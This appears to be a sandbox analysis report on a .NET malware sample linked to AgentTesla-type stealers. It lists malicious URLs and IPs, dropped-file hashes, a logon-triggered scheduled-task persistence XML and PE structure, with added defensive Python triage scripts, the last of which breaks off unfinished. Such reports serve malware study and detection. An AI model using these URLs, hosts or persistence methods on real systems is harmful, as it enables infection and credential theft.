CLOUDFLARENETUS | SecuriteInfo.com.W32.ABRisk.NVJI-4581.31168.9649.exe | malicious | Unknown | 172.67.213.82
CLOUDFLARENETUS | PO-095325.scr.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | https://docx-nok.online/ | malicious | HtmlDropper, HTMLPhisher | 172.67.179.148
CLOUDFLARENETUS | https://download-myproposal.xyz | malicious | HtmlDropper, HTMLPhisher | 104.17.2.184
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
rTDN001-180424_PDF.scr.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220, 104.26.12.205
PO-095325.scr.exe | malicious | AgentTesla | 149.154.167.220, 104.26.12.205
Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | 149.154.167.220, 104.26.12.205
W4tW72sfAD.exe | malicious | DCRat, PureLog Stealer, zgRAT | 149.154.167.220, 104.26.12.205
http://www.sushi-idea.com | malicious | Unknown | 149.154.167.220, 104.26.12.205
Receipt_032114005.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220, 104.26.12.205
DHL.exe | malicious | AgentTesla | 149.154.167.220, 104.26.12.205
eInvoicing_pdf.vbs | malicious | FormBook | 149.154.167.220, 104.26.12.205
KjCBSM7Ukv.exe | malicious | PureLog Stealer, XWorm | 149.154.167.220, 104.26.12.205
eO2bqORIJb.exe | malicious | AgentTesla | 149.154.167.220, 104.26.12.205
                                                                  No context
                                                                  Process:C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1415
                                                                  Entropy (8bit):5.352427679901606
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhPE4KMRbE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4x84j:MxHKlYHKh3oPHKMRbHKx1qHitHo6hAH4
                                                                  MD5:DE3D940E8A9B37DFC59B7160768581E1
                                                                  SHA1:BEBDEF8AD46E49F69824A37D87AC578DAA8721A6
                                                                  SHA-256:EF96DE13E112BE8682DDAFA535A2C22C98EBE65390BC43A435D35F92802EB905
                                                                  SHA-512:68490DAE1E337E3A8A2D78CFB9EE5099A468EFBB9AB1E582E351A669A65B0233A4A354420F2CD7E235993A9CA166126A035E3DF24213FFC4ADE6C0714DD7AF56
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                                                  Process:C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1415
                                                                  Entropy (8bit):5.352427679901606
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhPE4KMRbE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4x84j:MxHKlYHKh3oPHKMRbHKx1qHitHo6hAH4
                                                                  MD5:DE3D940E8A9B37DFC59B7160768581E1
                                                                  SHA1:BEBDEF8AD46E49F69824A37D87AC578DAA8721A6
                                                                  SHA-256:EF96DE13E112BE8682DDAFA535A2C22C98EBE65390BC43A435D35F92802EB905
                                                                  SHA-512:68490DAE1E337E3A8A2D78CFB9EE5099A468EFBB9AB1E582E351A669A65B0233A4A354420F2CD7E235993A9CA166126A035E3DF24213FFC4ADE6C0714DD7AF56
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):2232
                                                                  Entropy (8bit):5.380805901110357
                                                                  Encrypted:false
                                                                  SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyNs:lGLHyIFKL3IZ2KRH9Ougks
                                                                  MD5:E2041D8B64796610583A0818907F6010
                                                                  SHA1:FB12EA7BC43EFD4EFB0F8517EF2B28DB37B63773
                                                                  SHA-256:B385BC696645A7AE27DAE1DE0C6F737C14BC9266E7465E366B7A59B376E7B68A
                                                                  SHA-512:95617EA8A038226E0DA45FDB21A1EC59BA855A57B696CF018AC4CED51088D04A58B6A24F55ADFC81B8EBD73841D282D3A12D851FA90309B8681F1CF0FE9AB108
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1581
                                                                  Entropy (8bit):5.101676095819727
                                                                  Encrypted:false
                                                                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtn+xvn:cgergYrFdOFzOzN33ODOiDdKrsuTyv
                                                                  MD5:21B54999DABB8081011508222A9917C6
                                                                  SHA1:1590369EA20195EA675500978662103CC3F34DF0
                                                                  SHA-256:2FE3120B86569FC556C35CB00843C6B7BF62371A8ADB1B635EAAEF4C24A6C5B2
                                                                  SHA-512:CE14D9DC289E262963BB65F53E00DFAB663F1FDF513CF359C5E50B8F9C25A9DA8F0323ED96F4332DA85940D8E3C6543E00282D9CD51B206DDA0E9C6E5F64540A
                                                                  Malicious:true
                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                  Process:C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1581
                                                                  Entropy (8bit):5.101676095819727
                                                                  Encrypted:false
                                                                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtn+xvn:cgergYrFdOFzOzN33ODOiDdKrsuTyv
                                                                  MD5:21B54999DABB8081011508222A9917C6
                                                                  SHA1:1590369EA20195EA675500978662103CC3F34DF0
                                                                  SHA-256:2FE3120B86569FC556C35CB00843C6B7BF62371A8ADB1B635EAAEF4C24A6C5B2
                                                                  SHA-512:CE14D9DC289E262963BB65F53E00DFAB663F1FDF513CF359C5E50B8F9C25A9DA8F0323ED96F4332DA85940D8E3C6543E00282D9CD51B206DDA0E9C6E5F64540A
                                                                  Malicious:false
                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                  Process:C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):704512
                                                                  Entropy (8bit):7.9093549080558665
                                                                  Encrypted:false
                                                                  SSDEEP:12288:p+DOcsEdTxCGyzEcO8EupwU8VqZ33ojcXuh54OrTu94PvI2BNURvbrOj6uX:pST1eEcBEHqZc8O6+Pv+X3uX
                                                                  MD5:2D9DFDB275D38155CBA293DC619430FA
                                                                  SHA1:523F6A7040F3B330E708A3E84D48A18BDCD77110
                                                                  SHA-256:9BF25EBE467E570FC91E2003B17061C765FCB54B6D505A7DB43263981504FA5F
                                                                  SHA-512:B1809D426F7C9AE847E33BB0FB935194A9CFA098CF36F664DEAF8BD6B95A414F0FC0085EFBCB79272DAF7FDF45735E8841F1BD5102421AD276B5A784B5742C44
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../..f................................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........B...............................................................0..A....... .........%.....(......... 2........%.g...(.....h...(....*.....&*...B... ....(......*....0..............,.".".#..(....+...*..0...............".".#. ....(....+...*...0...............".".#...(....+...*..0...................... ....(....+...*..0..+.....................(N...+....s....}......j}....*..0............{......*...0..b.......~.........E........5....... ........... .....{.....(f.......,...
                                                                  Process:C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:false
                                                                  Preview:[ZoneTransfer]....ZoneId=0
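The dropped-file records above carry three things a reviewer checks by hand: a dropped PE whose hashes equal the submitted sample (a self-copy written to %AppData% for persistence), a 26-byte Zone.Identifier stream with ZoneId=0, and a Task Scheduler XML with a LogonTrigger. The script below is an added example, not part of the Joe Sandbox report; it parses the report's flat Key:Value layout (one record per Process: line) and flags those three cases. The LISTING input is constructed from the field values shown in this report, trimmed to the fields the triage uses; the record format is an assumption about how the report is rendered.

```python
"""Triage helper for the flattened 'Dropped Files' listing of a sandbox report.

Added example; it is not part of the Joe Sandbox report. It reads records in
the report's flat Key:Value layout (one record per 'Process:' line) and flags
three things a reviewer looks for: a dropped file whose hash equals the
submitted sample (self-copy for persistence), a Zone.Identifier stream and its
zone, and a scheduled-task XML with a logon trigger.
"""
import re

# SHA-256 of the submitted sample, as listed under General Information.
SUBMITTED_SHA256 = "9bf25ebe467e570fc91e2003b17061c765fcb54b6d505a7db43263981504fa5f"

# Zone.Identifier ZoneId values (URLZONE enumeration).
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

# Constructed input: three records copied from this report, trimmed to the
# fields the triage uses. Previews are as the report renders them, with
# non-printable bytes replaced by '.'.
LISTING = """\
Process:C:\\Users\\user\\Desktop\\z1E-catalogSamples.exe
File Type:XML 1.0 document, ASCII text
Size (bytes):1581
SHA-256:2FE3120B86569FC556C35CB00843C6B7BF62371A8ADB1B635EAAEF4C24A6C5B2
Malicious:true
Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. </LogonTrigger>
Process:C:\\Users\\user\\Desktop\\z1E-catalogSamples.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):704512
SHA-256:9BF25EBE467E570FC91E2003B17061C765FCB54B6D505A7DB43263981504FA5F
Malicious:true
Preview:MZ......................@...
Process:C:\\Users\\user\\Desktop\\z1E-catalogSamples.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):26
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
Malicious:false
Preview:[ZoneTransfer]....ZoneId=0
"""

# Matches both the report's dotted preview and a real stream ("[ZoneTransfer]\r\nZoneId=3").
ZONE_RE = re.compile(r"\[ZoneTransfer\][.\r\n]*ZoneId=(\d+)")


def parse_records(text):
    """Split the flat listing into one dict per dropped file.

    A record starts at each 'Process:' line; every later 'Key:Value' line is
    added to it. partition() splits on the first ':' only, so values that
    themselves contain colons (paths, URLs inside previews) survive intact.
    """
    records, current = [], None
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def triage(records, submitted_sha256):
    """Return a list of findings (kind, detail, sha256) in listing order."""
    findings = []
    for rec in records:
        sha = rec.get("SHA-256", "").lower()
        preview = rec.get("Preview", "")
        # Same content hash as the submitted binary: the malware wrote a copy
        # of itself rather than a distinct second stage.
        if sha == submitted_sha256.lower():
            findings.append(("self-copy", rec.get("Process", ""), sha))
        # Zone.Identifier stream: ZoneId=3 is what a browser download gets;
        # ZoneId=0 means the file carries no Mark-of-the-Web.
        m = ZONE_RE.search(preview)
        if m:
            zone = int(m.group(1))
            findings.append(("zone-identifier", ZONE_NAMES.get(zone, f"zone {zone}"), sha))
        # Task Scheduler XML that fires at logon: persistence via schtasks.
        if "<Task " in preview and "<LogonTrigger>" in preview:
            findings.append(("logon-task", rec.get("Malicious", ""), sha))
    return findings


if __name__ == "__main__":
    for kind, detail, sha in triage(parse_records(LISTING), SUBMITTED_SHA256):
        print(f"{kind:16} {detail:48} {sha[:16]}...")
```

On the full report the self-copy check is what ties the %AppData%\vZkoWbol.exe record to the submitted sample: its MD5, SHA1 and SHA-256 are identical to the General Information values, so the persistence copy is byte-for-byte the original, not an unpacked stage.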
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.9093549080558665
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:z1E-catalogSamples.exe
                                                                  File size:704'512 bytes
                                                                  MD5:2d9dfdb275d38155cba293dc619430fa
                                                                  SHA1:523f6a7040f3b330e708a3e84d48a18bdcd77110
                                                                  SHA256:9bf25ebe467e570fc91e2003b17061c765fcb54b6d505a7db43263981504fa5f
                                                                  SHA512:b1809d426f7c9ae847e33bb0fb935194a9cfa098cf36f664deaf8bd6b95a414f0fc0085efbcb79272daf7fdf45735e8841f1bd5102421ad276b5a784b5742c44
                                                                  SSDEEP:12288:p+DOcsEdTxCGyzEcO8EupwU8VqZ33ojcXuh54OrTu94PvI2BNURvbrOj6uX:pST1eEcBEHqZc8O6+Pv+X3uX
                                                                  TLSH:6DE4230CAFE98E51C2AD07BED06394991B35D392E007FB066ED094EE1D537A2D1C5BA3
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../..f................................. ........@.. ....................... ............@................................
                                                                  Icon Hash:9931c5b98687b385
                                                                  Entrypoint:0x4ac4fe
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x661F0F2F [Tue Apr 16 23:52:15 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
add byte ptr [eax], al
(the line above repeats to the end of the listing: after the six-byte jmp, FF 25 00 20 40 00, the remaining dumped bytes are zero padding, and the disassembler decodes each 00 00 pair as add byte ptr [eax], al. The jmp itself is the standard 32-bit .NET entry stub: an indirect jump through the import address table slot at 0x402000, RVA 0x2000 from the 0x400000 image base, to mscoree!_CorExeMain, the only import a plain managed executable declares, which is also why the Import Hash above is the value shared by plain .NET executables.)
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac4b0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xae000 | 0x1600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xaa504 | 0xaa600 | efc8e9a18a1893d428d58db5ed9404c4 | False | 0.9413503645451211 | data | 7.919359410493161 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xae000 | 0x1600 | 0x1600 | 2ad9d646792a418e4acbd118fb762c4b | False | 0.7341974431818182 | data | 6.525337678803363 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb0000 | 0xc | 0x200 | b4a6f2032cb6c7f12aac4e7429bf0505 | False | 0.041015625 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xae0c8 | 0xf5d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | - | - | 0.9125349605898805
RT_GROUP_ICON | 0xaf038 | 0x14 | data | - | - | 1.05
RT_VERSION | 0xaf05c | 0x3c0 | data | - | - | 0.4510416666666667
DLL | Import
mscoree.dll | _CorExeMain
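The directory, section and import tables above are the static tells of a managed .NET executable: a populated COM_DESCRIPTOR entry (the CLR header), an IAT holding a single slot for mscoree.dll!_CorExeMain, an empty SECURITY directory (no Authenticode signature), and a .text section whose entropy of 7.92 bits per byte sits close to the 8.0 maximum, consistent with the "very large array initializations" and "potential unpacker" signatures in the overview. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it constructs a minimal PE32 image in memory that carries the report's directory RVAs and sizes and its section names, virtual addresses and virtual sizes, parses the image back the way a triage script reads a real file, and derives those findings. The section bodies, raw sizes, file offsets and the 7.5 entropy threshold are constructed assumptions.

```python
"""Static PE triage over the directory, section and import tables above.
Added example, not report code: a minimal PE32 image is built in memory with
the report's directory RVAs/sizes and section names/addresses/virtual sizes
(bodies, raw sizes, offsets and the entropy threshold are constructed)."""
import math
import random
import struct

DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]
IMAGE_SCN_MEM_EXECUTE = 0x20000000
PACKED_ENTROPY = 7.5  # bits per byte (assumed threshold); uniform random data approaches 8.0

def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_pe(blob: bytes) -> dict:
    """DOS header -> PE signature -> COFF header -> optional header -> section headers."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ file")
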